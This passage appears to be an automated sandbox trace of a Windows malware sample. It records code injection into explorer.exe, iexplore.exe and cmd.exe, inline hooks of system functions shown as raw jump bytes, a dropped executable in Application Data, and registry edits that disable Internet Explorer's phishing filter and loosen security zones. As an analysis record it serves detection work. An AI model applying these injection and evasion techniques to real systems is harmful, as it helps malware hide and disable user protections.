\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-955B-B06D8410937F} success or wait 1 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 3 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615F-B06D7014937F} success or wait 1 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-CD5C-B06DDC17937F} success or wait 1 149A78C
\BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D55-B06D5C1E937F} success or wait 1 149A78C
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
536 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
168 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1920 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1448 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1100 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1716 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
508 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
1956 1712 7C8106F9 true C:\Program Files\Internet Explorer\iexplore.exe success or wait 1 1498106
2552 580 7C8106F9 true C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 1 1498106
2676 2152 7C8106F9 true C:\WINDOWS\system32\cmd.exe success or wait 1 1498106
2716 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
2808 1520 7C8106F9 false C:\WINDOWS\explorer.exe success or wait 1 1498106
+ Thread delayed
TID Delay Completion Count Source Address
1334 15s success or wait 1 1496E3D
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 149F078
1520 C:\WINDOWS\explorer.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 149F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1520 C:\WINDOWS\explorer.exe F30000 10 B8 35 00 00 00 E9 A9 D1 9D 7B success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 7C90D1AE 5 E9 A4 AE B8 84 success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3000A 10 68 6C 02 00 00 E9 1E 63 9E 7B success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 7C91632D 5 E9 09 1F B8 84 success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30014 10 8B FF 55 8B EC E9 A3 2E 2E 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 77212EBC 5 E9 FD 4B 27 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3001E 10 8B FF 55 8B EC E9 7E 60 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C60A1 5 E9 6F 1A 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30028 10 8B FF 55 8B EC E9 94 E9 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771CE9C1 5 E9 A6 91 2B 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30032 10 8B FF 55 8B EC E9 8A 2F 2E 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 77212FC1 5 E9 4B 4C 27 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3003C 10 8B FF 55 8B EC E9 4B 4D 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C4D8C 5 E9 25 2F 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30046 10 8B FF 55 8B EC E9 9F 82 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C82EA 5 E9 0A FA 2B 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30050 10 8B FF 55 8B EC E9 AB 90 2C 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771F9100 5 E9 34 EC 28 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3005A 10 8B FF 55 8B EC E9 98 89 2A 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771D89F7 5 E9 8B F3 2A 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30064 12 6A 2C 68 10 7B 1C 77 E9 59 79 29 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771C79C2 5 E9 F0 03 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30070 10 8B FF 55 8B EC E9 DE 9B 2C 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771F9C53 5 E9 B4 E1 28 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3007A 10 8B FF 55 8B EC E9 E5 8F 2A 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771D9064 5 E9 BB ED 2A 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F30084 10 8B FF 55 8B EC E9 4F B1 28 76 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 771BB1D8 5 E9 5F CC 2C 8A success or wait 1 149F11A
1520 C:\WINDOWS\explorer.exe F3008E 10 8B FF 55 8B EC E9 98 3D B8 70 success or wait 1 149F0EC
1520 C:\WINDOWS\explorer.exe 71AB3E2B 5 E9 3E E9 9D 8F success or wait 1 149F11A
1712 C:\Program Files\Internet Explorer\iexplore.exe 8000000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 1493F96
1712 C:\Program Files\Internet Explorer\iexplore.exe 80301F0 4 00 00 00 00 success or wait 1 149A8A9
1712 C:\Program Files\Internet Explorer\iexplore.exe 8030204 4 00 00 00 08 success or wait 1 149A8C9
1712 C:\Program Files\Internet Explorer\iexplore.exe 80306C8 4 B8 03 00 00 success or wait 1 149A0D4
1712 C:\Program Files\Internet Explorer\iexplore.exe 80306CC 4 B8 0A 00 00 success or wait 1 149A0D4
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E70000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 1493F96
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA01F0 4 00 00 00 00 success or wait 1 149A8A9
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA0204 4 00 00 E7 02 success or wait 1 149A8C9
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA06C8 4 54 0F 00 00 success or wait 1 149A0D4
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2EA06CC 4 3C 0F 00 00 success or wait 1 149A0D4
2152 C:\WINDOWS\system32\cmd.exe 150000 217088 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 success or wait 1 1493F96
2152 C:\WINDOWS\system32\cmd.exe 1801F0 4 00 00 00 00 success or wait 1 149A8A9
2152 C:\WINDOWS\system32\cmd.exe 180204 4 00 00 15 00 success or wait 1 149A8C9
2152 C:\WINDOWS\system32\cmd.exe 1806C8 4 10 00 00 00 success or wait 1 149A0D4
2152 C:\WINDOWS\system32\cmd.exe 1806CC 4 24 00 00 00 success or wait 1 149A0D4
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 26D0000 29FF8C8 page read and write success or wait 1 149A5EB
1520 C:\WINDOWS\explorer.exe 26D0000 29FF8CC page read and write success or wait 1 149A5EB
1520 C:\WINDOWS\explorer.exe F30000 29FF4C0 page execute and read and write success or wait 1 14A3FCB
1520 C:\WINDOWS\explorer.exe F40000 2AFE848 page read and write success or wait 44 1491C3E
1712 C:\Program Files\Internet Explorer\iexplore.exe 8000000 2A7FCC8 page execute and read and write success or wait 1 1493F5F
580 C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe 2E70000 2A7FCC8 page execute and read and write success or wait 1 1493F5F
488 C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe 0 2A7FCC8 page execute and read and write process is terminating 1 1493F5F
2152 C:\WINDOWS\system32\cmd.exe 150000 2A7FCC8 page execute and read and write success or wait 1 1493F5F
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1520 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 149F134
1520 C:\WINDOWS\explorer.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 149F04F
1520 C:\WINDOWS\explorer.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 149F134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 15 14A8879
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Children TID Window Handles Completion Count Source Address
0 0 false 618 1006a, 3012e, 300a8, 30088, 1006e, 10084, 10068, 1006c, 30056, 70100, 3f0110, 7010c, 7004c, 300a4, 30094 success or wait 2 1493DBB
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 14A8925
+ Chronological sections
Operation Data Completion Time
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 26D0000 Length: 29FF8C8 Allocation Type: null Protection: page read and write success or wait 2629492827
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 26D0000 Length: 29FF8CC Allocation Type: null Protection: page read and write success or wait 2629495081
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2629622961
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2629633779
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2629639392
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 Type: Dword Data: 0 Old data: 1 success or wait 2629644633
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: CleanCookies Type: Dword Data: 0 success or wait 2629719029
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1406 success or wait 2629719918
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\Privacy Name: 1609 success or wait 2629757655
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629762578
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 Name: 1406 success or wait 2629778719
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 Type: Dword Data: 0 Old data: 1 success or wait 2629782291
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 success or wait 2629785188
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629790162
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 Name: 1406 success or wait 2629792043
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 Type: Dword Data: 0 Old data: 3 success or wait 2629800301
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 success or wait 2629815114
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629822075
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 Name: 1406 success or wait 2629822628
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 Type: Dword Data: 0 Old data: 3 success or wait 2629825652
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 success or wait 2629829448
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629834200
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Name: 1406 success or wait 2629834761
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1406 Type: Dword Data: 0 Old data: 3 success or wait 2629835960
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 success or wait 2629836532
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 Name: 1609 Type: Dword Data: 0 Old data: 1 success or wait 2629848816
Memory allocated PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30000 Length: 29FF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2629851899
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629856233
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2629856944
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F30000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 9D 7B success or wait 2629860570
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE B8 84 success or wait 2629873842
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629874165
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2629877561
Memory read PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2629877896
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: F3000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 9E 7B success or wait 2629881609
Memory written PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 5 Value: E9 09 1F B8 84 success or wait 2629887786
Memory attributes changed PID: 1520 Path: C:\WINDOWS\explorer.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2629888106
